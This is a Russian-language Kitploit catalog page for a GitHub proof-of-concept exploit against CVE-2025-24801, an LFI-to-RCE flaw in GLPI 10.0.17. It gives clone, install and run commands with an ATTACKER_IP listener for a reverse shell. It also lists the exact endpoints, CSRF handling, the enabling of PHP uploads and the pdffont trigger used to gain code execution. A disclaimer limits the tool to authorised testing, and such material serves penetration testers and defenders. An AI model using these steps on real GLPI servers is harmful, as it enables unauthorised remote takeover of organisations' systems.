Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-24801 — Доказательство концепции эксплуатации для CVE-2025-24801, уязвимости LFI-to-RCE в GLPI 10.0.17. Автоматизирует вход в систему, включает загрузку PHP-файлов и загружает reverse shell для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/fatkz/cve-2025-24801
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubfatkz/cve-2025-24801

CVE-2025-24801

Доказательство концепции эксплуатации для CVE-2025-24801, уязвимости LFI-to-RCE в GLPI 10.0.17. Автоматизирует вход в систему, включает загрузку PHP-файлов и загружает reverse shell для авторизованного тестирования безопасности.

Репозиторий
31111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-24801 PoC для GLPI RCE

Этот репозиторий содержит скрипт proof-of-concept (poc.py), который эксплуатирует CVE-2025-24801 — уязвимость LFI-to-RCE в GLPI 10.0.17. Он автоматизирует:

  • Вход в GLPI
  • Включение загрузки .php путем обновления настроек типа документа
  • Загрузку PHP reverse shell через AJAX-эндпоинт загрузки файлов

🛠️ Установка

root@kitploit:~
git clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt

🚀 Использование

root@kitploit:~
python3 poc.py \
  --url https://target.example.com/glpi \
  --user TECHNICIAN_USER \
  --password "PASSWORD" \
  --lhost ATTACKER_IP \
  --lport 4444
  • --url: Базовый URL экземпляра GLPI (например, )
https://example.com/glpi
  • --user / --password: Действительные учетные данные техника GLPI
  • --lhost / --lport: IP-адрес и порт атакующего для слушателя reverse shell
  • Скрипт автоматически использует --doc-id 1 по умолчанию для обновления первого типа документа.

    После выполнения скрипт:

    1. Войдет в систему и установит сессию
    2. Включит загрузку .php, обновив тип документа с ID 1
    3. Загрузит exploit.php, содержащий полезную нагрузку PHP reverse shell

    Затем вам нужно будет вручную вызвать LFI, указав имя загруженного файла во включении шрифта PDF (например, через функцию экспорта отчетов), чтобы добиться RCE.

    📑 Как это работает

    1. Вход: Извлекает CSRF-токен из /front/login.php и отправляет учетные данные для аутентификации.
    2. Включение загрузки PHP: Получает /front/documenttype.form.php?id=1, разбирает CSRF-токен и добавляет php в список разрешенных расширений.
    3. Загрузка шелла: Получает /front/ticket.form.php для получения CSRF-токена, затем использует /ajax/fileupload.php (с X-Requested-With: XMLHttpRequest) для загрузки PHP reverse shell.
    4. Запуск RCE: Вручную вызовите LFI шрифта PDF, указав имя загруженного файла шелла в параметре pdffont при экспорте отчета.

    ⚠️ Отказ от ответственности

    Этот инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей. Не используйте его против систем без явного разрешения.


    Создано для образовательных и авторизованных тестов на проникновение.

    Скачать инструмент